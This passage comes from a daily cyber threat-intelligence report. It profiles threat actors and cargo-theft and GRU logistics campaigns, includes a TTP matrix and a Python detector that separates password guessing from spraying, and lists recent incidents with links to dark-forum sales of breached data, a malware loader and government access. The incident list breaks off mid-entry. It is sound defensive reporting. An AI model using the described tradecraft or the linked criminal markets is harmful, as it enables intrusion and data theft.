- Wizard Spider: A Russian/Ukrainian group suspected of being behind significant ransomware attacks, often associated with the Trickbot malware.55
This variety underscores the fragmented yet interconnected nature of the cyber threat environment, where different groups specialize in different types of attacks and target various sectors based on their objectives.
Further Reading:
- https://en.wikipedia.org/wiki/List_of_hacker_groups 55
Threat Actor: (Clarification for “Cargo threat actor”)
The term “Cargo threat actor” does not name a single group; it describes a class of activity against the logistics and transportation sector in which cyber intrusion enables physical theft and fraud. The two sources behind this entry concern different actors: an insurance-industry account of criminal cargo theft and fraud 2, and a CISA advisory attributing a campaign against Western logistics entities and technology companies to the Russian GRU 3. The TTPs below are therefore drawn from both criminal and state-sponsored operations.
Motivations differ accordingly: direct financial gain through cargo theft and payment fraud on one side, and espionage, such as monitoring aid shipments, on the other.2 Because both depend on the same logistics systems and much the same tradecraft, the same TTPs can appear in either context, which is what blurs the line between financially motivated and state-sponsored operations in this sector.
The tactics, techniques, and procedures (TTPs) employed in these attacks are sophisticated:
- Cyber-Facilitated Theft: Adversaries leverage cyber tactics to impersonate legitimate carriers, reroute deliveries, and execute “fictitious pickups,” where fake trucks, complete with correct branding, arrive to collect and disappear with high-value goods.2 This involves infiltrating logistics systems and monitoring delivery schedules.2
- Initial Access: Common initial access vectors include credential guessing or brute force attacks (T1110.001, T1110.003), and spearphishing campaigns designed to steal credentials or deliver malware (T1566).3 Actors also abuse vulnerabilities in small office/home office (SOHO) devices to facilitate covert cyber operations and proxy malicious activity.3 Exploitation of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026) has been observed to execute arbitrary shell commands, gain access to victim email accounts, and retrieve sensitive data from email servers (T1059, T1114).3
- Lateral Movement: Native commands and open-source tools like Impacket and PsExec (TA0008) are used to move laterally within compromised environments.3
The logistics and final-mile delivery sectors are particularly exposed because of minimal cyber protection, fragmented systems, and the rapid growth of digital platforms such as load boards and freight-matching apps.2 The result is systemic risk in which a digital compromise translates directly into physical loss.2 The CISA advisory, which ties the logistics targeting to a wider espionage campaign that included IP camera targeting in Ukraine and bordering NATO nations, underscores the strategic value of this sector to state actors as well as criminals.3 This convergence of cyber and physical crime calls for an integrated risk management approach in these industries.
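The initial-access techniques listed above, password guessing (T1110.001) and password spraying (T1110.003), leave different footprints in authentication logs and defeat different controls: a per-account lockout stops guessing but never fires on a spray. The following detector, an added example that is not from the cited advisory, separates the two by looking at failed logons per source address over a sliding window. It assumes sshd “Failed password” lines prefixed with an ISO-8601 timestamp; the log lines, addresses and thresholds are constructed for the example.

```python
"""Separate password guessing (T1110.001) from password spraying (T1110.003)
in failed-logon records. Added example, not from the cited CISA advisory;
the sshd-style log lines below are constructed.
"""
from __future__ import annotations

import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple

# sshd 'Failed password' line with an ISO-8601 timestamp prefix (assumed format).
FAILED = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


class Failure(NamedTuple):
    ts: datetime
    user: str
    ip: str


class Alert(NamedTuple):
    technique: str
    source_ip: str
    detail: str


def parse_failed_logins(lines) -> list[Failure]:
    """Keep only failed-password records; successes and other lines are dropped."""
    events = []
    for line in lines:
        m = FAILED.match(line)
        if m:
            events.append(Failure(datetime.fromisoformat(m["ts"]), m["user"], m["ip"]))
    return events


def detect_credential_attacks(events, window=timedelta(minutes=10),
                              guess_threshold=8, spray_min_users=5,
                              spray_max_per_user=2) -> list[Alert]:
    """Sliding window per source IP. Guessing: many failures against one account.
    Spraying: a few failures each against many accounts, staying under lockout."""
    by_ip: dict[str, list[Failure]] = defaultdict(list)
    for ev in events:
        by_ip[ev.ip].append(ev)
    alerts, seen = [], set()
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.ts)
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e.ts - start.ts <= window]
            counts = Counter(e.user for e in in_window)
            top_user, top_n = counts.most_common(1)[0]
            if top_n >= guess_threshold and (ip, "guess") not in seen:
                seen.add((ip, "guess"))
                alerts.append(Alert("T1110.001 password guessing", ip,
                                    f"{top_n} failures for '{top_user}' within {window}"))
            if (len(counts) >= spray_min_users and top_n <= spray_max_per_user
                    and (ip, "spray") not in seen):
                seen.add((ip, "spray"))
                alerts.append(Alert("T1110.003 password spraying", ip,
                                    f"{len(counts)} accounts, at most {top_n} attempt(s) each"))
    return alerts


# Constructed log: a burst against 'admin' from 10.0.0.5, a low-and-slow spray
# across six accounts from 203.0.113.9, and one ordinary typo from 192.0.2.4.
SAMPLE_LOG = [
    f"2025-07-08T03:00:{i:02d} sshd[1201]: Failed password for admin from 10.0.0.5 port {40000 + i} ssh2"
    for i in range(10)
] + [
    "2025-07-08T03:05:00 sshd[1330]: Failed password for alice from 203.0.113.9 port 50001 ssh2",
    "2025-07-08T03:06:10 sshd[1331]: Failed password for bob from 203.0.113.9 port 50002 ssh2",
    "2025-07-08T03:07:25 sshd[1332]: Failed password for invalid user carol from 203.0.113.9 port 50003 ssh2",
    "2025-07-08T03:08:40 sshd[1333]: Failed password for dave from 203.0.113.9 port 50004 ssh2",
    "2025-07-08T03:09:55 sshd[1334]: Failed password for erin from 203.0.113.9 port 50005 ssh2",
    "2025-07-08T03:11:05 sshd[1335]: Failed password for invalid user frank from 203.0.113.9 port 50006 ssh2",
    "2025-07-08T03:12:00 sshd[1400]: Failed password for jdoe from 192.0.2.4 port 51000 ssh2",
    "2025-07-08T03:12:09 sshd[1401]: Accepted password for jdoe from 192.0.2.4 port 51000 ssh2",
]

if __name__ == "__main__":
    for a in detect_credential_attacks(parse_failed_logins(SAMPLE_LOG)):
        print(a.technique, a.source_ip, "-", a.detail)
```

The spray rule is the one worth tuning: spray_min_users must sit below the number of accounts an attacker can enumerate from a public source such as a staff directory, and spray_max_per_user must sit below the domain lockout threshold, otherwise the lockout policy itself becomes the only signal and the attacker has already paced around it.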
Further Reading:
- https://www.risk-strategies.com/blog/cybercrime-in-supply-chains-cargo-theft-fraud-insurance-gaps 2
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a 3
Table 2: Threat Actor TTP Matrix (Illustrative Sample)
This matrix provides a comparative overview of selected threat actors’ common tactics, techniques, and procedures, aiding in understanding their operational playbooks.
| Threat Actor | Primary Motivation | Initial Access Vectors | Execution & Persistence | Defense Evasion | Impact & Monetization | Target Sectors |
|---|---|---|---|---|---|---|
| Phorpiex | Financial | Infected USB drives, phishing (IM, email), malicious downloads, worm modules 4 | Malware delivery (ransomware, cryptominers, infostealers), spambots 4 | Operates without active C2 (implied resilience) 5 | Extortion (sextortion), cryptojacking, selling access to systems, ransomware, spam emails 4 | Finance sector (Europe, North America) 5 |
| Pryx | Financial | Malware/ransomware development, identity access brokering 6 | Novel info-stealing malware, Hellcat ransomware 6 | Not explicitly detailed, focus on development 6 | Ransomware (Hellcat), selling access/malware 6 | Unspecified (Hellcat victims) 6 |
| Velvet Ant | Espionage | Legacy F5 BIG-IP persistence 8 | PlugX RAT (DLL side-loading), Impacket for lateral movement 8 | Internal C&C via F5 BIG-IP, disabling EDR, dual PlugX versions (covert C2) 8 | Sensitive information collection (customer, financial) 8 | East Asian organizations 8 |
| Team Insane PK | Ideological | Not explicitly detailed, likely public-facing vulnerabilities | DDoS attacks, data leaks 27 | Use of check-host.net for proof (public validation) 28 | Service disruption (DDoS), public shaming (data leaks), spreading religious messages 27 | Indian/Iranian government, banking, finance, education, telecom, manufacturing, national archives 27 |
| JINX-0132 | Financial | Misconfigured Nomad API, Gitea RCE, Consul misconfigurations 53 | XMRig cryptominer deployment 53 | Obfuscation via offensive task group names 53 | Cryptojacking (Monero mining) 53 | Organizations with misconfigured cloud/DevOps environments (Nomad, Gitea, Consul) 53 |
| RansomHub | Financial | Known vulnerabilities (Zerologon), spear-phishing 48 | WMI, PowerShell, PsExec, RDP, SMB, SSH, Impacket, remote management tools 48 | Masquerading, log deletion, disabling security tools 48 | Data encryption, data exfiltration (financial, client, IP), pressure tactics 48 | Aerospace, defense, energy, healthcare, government, law enforcement, telecom, pharma, manufacturing 48 |
| UNC3944 | Financial | SMS phishing for credentials 1 | Hive/DragonForce ransomware deployment 1 | Abusing legitimate Microsoft-signed drivers (Poortry, Stonestop), attestation signing 1 | Ransomware, SIM swapping services 1 | Telecom, BPO, MSSP, financial services, entertainment, medical 1 |
| Cargo TA (Generic) | Financial/Espionage | Credential guessing/brute force, spearphishing, SOHO device vulns, Roundcube CVEs 3 | Impacket, PsExec for lateral movement 3 | Proxy malicious activity via SOHO devices 3 | Cyber-facilitated cargo theft (fictitious pickups), rerouted payments, espionage (monitoring aid shipments) 2 | Logistics, transportation hubs, maritime, air traffic management, IT services, IP cameras 2 |
(Note: This table contains a representative sample of threat actors and their TTPs based on the provided research. It is illustrative and would be dynamically populated and expanded with real-time data in a live report.)
IV. Conclusions and Recommendations
The daily analysis of cyber incidents underscores several critical observations for organizations seeking to enhance their security posture.
First, the evolving sophistication of financially motivated cybercrime is undeniable. The adoption of advanced evasion techniques, such as abusing legitimate Microsoft-signed drivers by groups like UNC3944 1 and exploiting zero-day vulnerabilities in common software by EncryptHub 42, demonstrates that high-end capabilities are no longer exclusive to state-sponsored actors. This means that defense strategies must be robust and comprehensive across the board, assuming that any adversary, regardless of their primary objective, may possess or acquire advanced tools and methods. Organizations should invest in advanced endpoint detection and response (EDR) solutions capable of identifying anomalous behavior even from trusted binaries, and rigorously monitor the use of legitimate system tools for malicious purposes.
Second, the rise of “as-a-Service” models, exemplified by RansomHub’s RaaS and World Leaks’ EaaS platforms 32, coupled with inter-group collaborations, signifies a highly specialized and interconnected cybercrime ecosystem. This modularity in attack operations means that a compromise might be initiated by one actor, for instance, a botnet operator providing initial access, and then leveraged by another for encryption or extortion. This necessitates a holistic view of the attack kill chain, moving beyond isolated threat intelligence to understand how different components of the cybercrime supply chain interact. Organizations should prioritize intelligence sharing and collaborative defense frameworks to counter these networked threats.
Third, the shift in extortion tactics, particularly World Leaks’ move towards “extortion-only” operations 32, indicates that increased law enforcement pressure and improved defenses are making direct ransomware deployment riskier for some groups. However, the continued occurrence of ransomware in some of World Leaks’ operations 32 highlights that this shift is not absolute. Data exfiltration for extortion will remain a primary threat, and the psychological pressure tactics employed by these groups (e.g., countdown timers, direct chats, selective data exposure) are potent. Comprehensive incident response plans must therefore address not only technical remediation but also robust communication strategies and reputational risk management.
Fourth, the exploitation of misconfigurations in cloud and DevOps tools, as demonstrated by JINX-0132 53, represents a growing and critical attack vector. These vulnerabilities often go unnoticed compared to traditional software flaws. Beyond routine vulnerability patching, organizations must prioritize secure configuration management, especially for cloud-native applications and development environments. Implementing strict security baselines, regularly auditing configurations, and ensuring that default settings are hardened are essential steps to close these increasingly targeted gaps.
Finally, the observed tendency of some threat actors, such as Handala Hack, to exaggerate or fictionalize their claims 37 underscores the importance of critical evaluation in threat intelligence consumption. These “perception hacking” operations aim to influence public opinion and incite fear, making the narrative of an attack as impactful as the technical breach itself. Organizations must verify claims through multiple, trusted sources and understand that public pronouncements by adversaries may serve strategic information warfare objectives rather than purely factual reporting of technical success. This requires a discerning approach to incoming threat intelligence and a focus on verifiable indicators of compromise and TTPs.
In conclusion, the cyber threat landscape is continuously adapting. Organizations must move beyond static defenses to embrace dynamic, intelligence-driven security postures that account for the evolving motivations, capabilities, and interconnectedness of threat actors. Prioritizing fundamental cyber hygiene, investing in advanced detection capabilities, and integrating proactive threat intelligence into operational workflows are paramount to building resilience against these persistent and sophisticated threats.
V. Comprehensive Incident Details
This section provides a comprehensive list of all cybersecurity incidents reported within the last 24 hours, including all relevant details and links.
Incident: Alleged sale of UAE Private Business Database
- Category: Data Breach
- Content: Threat actor claims to have obtained the database allegedly containing a comprehensive list of 1 million UAE professionals, featuring contact details such as PO Box numbers, UAE landline numbers (+971), names and job titles, email addresses, company or personal names, fax numbers, websites, and detailed company information.
- Date: 2025-07-08T14:04:12Z
- Network: openweb
- Published URL: https://darkforums.st/Thread-Selling-UAE-Private-Business-Database-%E2%80%93-1-Million-Verified-Contacts-with-Email
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3afd6395-71ee-421c-865e-3150330e42fb.png
- Threat Actor(s): PhycoX
- Title: Alleged sale of UAE Private Business Database
- Victim Country: UAE
- Victim Industry:
- Victim Organization:
- Victim Site:
Incident: Alleged database sale of Skillbee
- Category: Data Breach
- Content: Threat actor claims to be selling database containing 635k contacts allegedly from Skillbee in the United Arab Emirates. The compromised data includes ID, name, country code, phone number, nationality, and salary details of the individuals.
- Date: 2025-07-08T13:11:24Z
- Network: openweb
- Published URL: https://darkforums.st/Thread-Selling-Skillbee-com-database-of-United-Arab-Emirates
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3a82f292-cb9a-49cd-ac89-6e1d391844d6.png
- Threat Actor(s): michael1256
- Title: Alleged database sale of Skillbee
- Victim Country: India
- Victim Industry: Staffing/Recruiting
- Victim Organization: skillbee
- Victim Site: skillbee.com
Incident: Alleged sale of Zoom Private SI Kit Loader
- Category: Malware
- Content: The threat actor is selling a Zoom Private SI Kit loader, designed for social engineering operations. The kit includes a spoofed Zoom page and a manual containing commands and instructions to deliver payloads from a remote server directly to a target machine. The method is customizable based on operational needs.
- Date: 2025-07-08T13:03:52Z
- Network: openweb
- Published URL: https://ramp4u.io/threads/zoom-private-si-kit-loader.3261/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7afeea0b-1123-41f6-af0c-c33684b64f7c.png
- Threat Actor(s): anongod
- Title: Alleged sale of Zoom Private SI Kit Loader
- Victim Country:
- Victim Industry:
- Victim Organization:
- Victim Site:
Incident: Alleged data breach of Helwan University
- Category: Data Breach
- Content: Threat actor claims to have obtained the database containing 20K Records. Compromised data allegedly includes first name, last name, third name, phone, email, Specialization, StudentID, personId.
- Date: 2025-07-08T12:52:24Z
- Network: openweb
- Published URL: https://darkforums.st/Thread-%F0%9F%87%AA%F0%9F%87%AC-Egypt-University-Full-Student-%E2%80%93-20K-Records-CSV-2025
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3348e94d-ad99-42ac-a850-a73d13c1a4c3.png
- Threat Actor(s): namolesa
- Title: Alleged data breach of Helwan University
- Victim Country: Egypt
- Victim Industry: Higher Education/Academia
- Victim Organization: helwan university
- Victim Site: helwan.edu.eg
Incident: Alleged Sale of EDRs and USA Government Data
- Category: Initial Access
- Content: Threat actor claims to be selling EDR access and U.S. government data packages, along with regular government records from countries such as Argentina, Brazil, and Zambia. The offering also includes premium bundles featuring social media subpoenas, forged documents, and high-value subpoenas for platforms like Instagram, Facebook, Telegram, and Gmail.
- Date: 2025-07-08T12:05:54Z
- Network: openweb
- Published URL: https://kittyforums.to/thread/575
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/106a87b9-61c5-4caf-91f2-cb0c905c40d2.png
- Threat Actor(s): caeer
- Title: Alleged Sale of EDRs and USA Government Data
- Victim Country:
- Victim Industry:
- Victim Organization:
- Victim Site:
Incident: Alleged access to Saudi Ministry of Justice
- Category: Initial Access
- Content: The threat actor claims to have accessed the SSL-VPN Portal of Saudi Ministry of Justice.
- Date: 2025-07-08T11:47:27Z
- Network: openweb
- Published URL: https://darkforums.st/Thread-Saudi-Ministry-of-Justice-https-www-moj-gov-sa
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7dbff052-0f01-4896-991d-d559de475c3a.png
- Threat Actor(s): eksta
- Title: Alleged access to Saudi Ministry of Justice
- Victim Country: Saudi Arabia
- Victim Industry: Government Administration
- Victim Organization: saudi ministry of justice
- **Victim
Works cited
- Threat actors abuse legitimate Microsoft drivers to bypass security | Cybersecurity Dive, accessed July 8, 2025, https://www.cybersecuritydive.com/news/threat-actors-microsoft-bypass-security/638698/
- Cybercrime in Supply Chains: Cargo Theft, Fraud & Insurance Gaps – Risk Strategies, accessed July 8, 2025, https://www.risk-strategies.com/blog/cybercrime-in-supply-chains-cargo-theft-fraud-insurance-gaps
- Russian GRU Targeting Western Logistics Entities and Technology Companies – CISA, accessed July 8, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a
- Phorpiex Malware – Check Point Software, accessed July 8, 2025, https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/phorpiex-malware/
- Phorpiex malware campaign targets finance sector in Europe and North America, accessed July 8, 2025, https://www.broadcom.com/support/security-center/protection-bulletin/phorpiex-malware-campaign-targets-finance-sector-in-europe-and-north-america
- Threat Actor Spotlight: Pryx – Morado Intelligence, accessed July 8, 2025, https://www.morado.io/blog-posts/threat-actor-spotlight-pryx
- All Threat Actors, APTs and known groups | BreachHQ by Beyond Identity, accessed July 8, 2025, https://breach-hq.com/threat-actors
- China-Linked Hackers Infiltrate East Asian Firm for 3 Years Using F5 Devices, accessed July 8, 2025, https://thehackernews.com/2024/06/china-linked-hackers-infiltrate-east.html
- The Underground Economist: Volume 5, Issue 1 – ZeroFox, accessed July 8, 2025, https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-1/
- Bl00dy Ransomware | WatchGuard Technologies, accessed July 8, 2025, https://www.watchguard.com/br/wgrd-ransomware/bl00dy
- The Underground Economist: Volume 5, Issue 11 – ZeroFox, accessed July 8, 2025, https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-11/
- Decoding The Naming Game: Why Standardizing Threat Actor Names Alone Won’t Enhance Your Security Posture Or Response – Forrester, accessed July 8, 2025, https://www.forrester.com/blogs/decoding-the-naming-game-why-standardizing-threat-actor-names-alone-wont-enhance-your-security-posture-or-response/
- Anonymous (hacker group) – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)
- Nobelium SolarWinds Hacker – Threatcop, accessed July 8, 2025, https://threatcop.com/blog/nobelium-solarwind-hackers/
- About Us – Career Hackers, accessed July 8, 2025, https://careerhackers.io/pro/about-us
- The Job Hackers – Changing the Way People Connect With Their Lives and Careers, accessed July 8, 2025, https://www.thejobhackers.org/
- What is a Cyber Threat Actor? | CrowdStrike, accessed July 8, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
- What Is a Threat Actor? – Definition, Types & More | Proofpoint US, accessed July 8, 2025, https://www.proofpoint.com/us/threat-reference/threat-actor
- Trojan:Win32/Ekstak threat description – Microsoft Security Intelligence, accessed July 8, 2025, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Ekstak&ThreatID=2147735572
- Revealing Corporate Vulnerabilities: Understanding How Threat Actors Breach and Exploit Your Data | KELA Cyber, accessed July 8, 2025, https://www.kelacyber.com/blog/revealing-corporate-vulnerabilities-understanding-how-threat-actors-breach-and-exploit-your-data/
- Equation Group – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Equation_Group
- Ghost Squad Hackers – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Ghost_Squad_Hackers
- Mr. Robot – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Mr._Robot
- Threat actor – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Threat_actor
- Mandiant links DragonForce ransomware attacks on UK retailers to UNC3944 tactics, highlighting links to RansomHub – Industrial Cyber, accessed July 8, 2025, https://industrialcyber.co/ransomware/mandiant-links-dragonforce-ransomware-attacks-on-uk-retailers-to-unc3944-tactics-highlighting-links-to-ransomhub/
- Orange Group investigates cyberattack as hacker releases compromised data, accessed July 8, 2025, https://www.techmonitor.ai/technology/cybersecurity/orange-group-investigates-cyberattack-hacker-compromised-data
- Team Insane PK: The Religious Hacktivist | Radware, accessed July 8, 2025, https://www.radware.com/cyberpedia/ddos-attacks/hacktivist-group-team-insane-pk/
- Team Insane PK claims DDoS Attack on 44 Indian Banking and …, accessed July 8, 2025, https://www.cloudsek.com/threatintelligence/team-insane-pk-claims-ddos-attack-on-44-indian-banking-and-finance-websites
- Threat actors: Who they are and how Google protects you – YouTube, accessed July 8, 2025, https://www.youtube.com/watch?v=UgP0RaPzo0I
- 13 Most Famous Hacker Groups in History – Webopedia, accessed July 8, 2025, https://www.webopedia.com/technology/famous-hacker-groups/
- Top 10 Most Famous Hacker Groups and Their Deeds – Mysterium VPN, accessed July 8, 2025, https://www.mysteriumvpn.com/blog/famous-hacker-groups
- World Leaks: An Extortion Platform – Lexfo’s security blog, accessed July 8, 2025, https://blog.lexfo.fr/world-leaks-an-extortion-platform.html
- Surmodics & Kentfield Hospital Fall Victim to Cyberattacks – The HIPAA Journal, accessed July 8, 2025, https://www.hipaajournal.com/surmodics-kentfield-hospital-cyberattacks/
- Digital Ghost | Profile – HackerOne, accessed July 8, 2025, https://hackerone.com/digital_ghost
- Ghost Squad Hackers–Modem Mischief – Apple Podcasts, accessed July 8, 2025, https://podcasts.apple.com/cz/podcast/ghost-squad-hackers/id1585249019?i=1000636587679
- Iranian hacker group targets Israeli kindergartens’ PA systems | Iran …, accessed July 8, 2025, https://www.iranintl.com/en/202501265679
- Iran Conducts Cyberattacks to Terrorize Israelis – FDD, accessed July 8, 2025, https://www.fdd.org/analysis/policy_briefs/2025/02/03/iran-conducts-cyberattacks-to-terrorize-israelis/
- Adversarial Misuse of Generative AI | Google Cloud Blog, accessed July 8, 2025, https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai
- Russian hackers targeting German politicians — report – DW – 03/22/2024, accessed July 8, 2025, https://www.dw.com/en/russian-hackers-targeting-german-politicians-report/a-68648816
- Threat Actors Target U.S. Critical Infrastructure with LummaC2 Malware | CISA, accessed July 8, 2025, https://www.cisa.gov/news-events/alerts/2025/05/21/threat-actors-target-us-critical-infrastructure-lummac2-malware
- What is a Threat Actor? Types & Examples – SentinelOne, accessed July 8, 2025, https://www.sentinelone.com/cybersecurity-101/threat-intelligence/threat-actor/
- Russian threat actor weaponized Microsoft Management Console flaw | Cybersecurity Dive, accessed July 8, 2025, https://www.cybersecuritydive.com/news/russian-threat-actor-weaponizing-microsoft-management-console-zero-day/743558/
- Threat Actor – MISP galaxy, accessed July 8, 2025, https://misp-galaxy.org/threat-actor/
- Markus Hess – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/Markus_Hess
- Guess Confirms Ransomware Attack and Data Breach – Bank Info Security, accessed July 8, 2025, https://www.bankinfosecurity.com/guess-confirms-ransomware-attack-data-breach-a-17058
- BreachRx – Incident Management Software, accessed July 8, 2025, https://www.breachrx.com/
- The Zero Day Intelligence Revolution: Why Reactive Cybersecurity is Dead – Medium, accessed July 8, 2025, https://medium.com/@pi._.ku/the-zero-day-intelligence-revolution-why-reactive-cybersecurity-is-dead-dde49a5df485
- Threat Actor Profile: RansomHub Ransomware Group – Cyble, accessed July 8, 2025, https://cyble.com/threat-actor-profiles/ransomhub-ransomware-group/
- Ransomware Rebounds: Extortion Threat Surges in 2023, Attackers Rely on Publicly Available and Legitimate Tools – Google Cloud, accessed July 8, 2025, https://cloud.google.com/blog/topics/threat-intelligence/ransomware-attacks-surge-rely-on-public-legitimate-tools
- Company Overview Aura Fast Facts The Industry Today, accessed July 8, 2025, https://filecache.mediaroom.com/mr5mr_intrusta/177482/aura%20%281%29.pdf
- Antivirus & Anti-malware Software | Reliable Virus Scanner – Aura, accessed July 8, 2025, https://www.aura.com/antivirus
- Aura | Intelligent Digital Safety for the Whole Family, accessed July 8, 2025, https://www.aura.com/
- DevOps Tools Targeted for Cryptojacking | Wiz Blog, accessed July 8, 2025, https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign
- How Threat Actor Profiling Can Help Prevent Ransomware Attacks – YouTube, accessed July 8, 2025, https://www.youtube.com/watch?v=2Ucp64KpNi4
- List of hacker groups – Wikipedia, accessed July 8, 2025, https://en.wikipedia.org/wiki/List_of_hacker_groups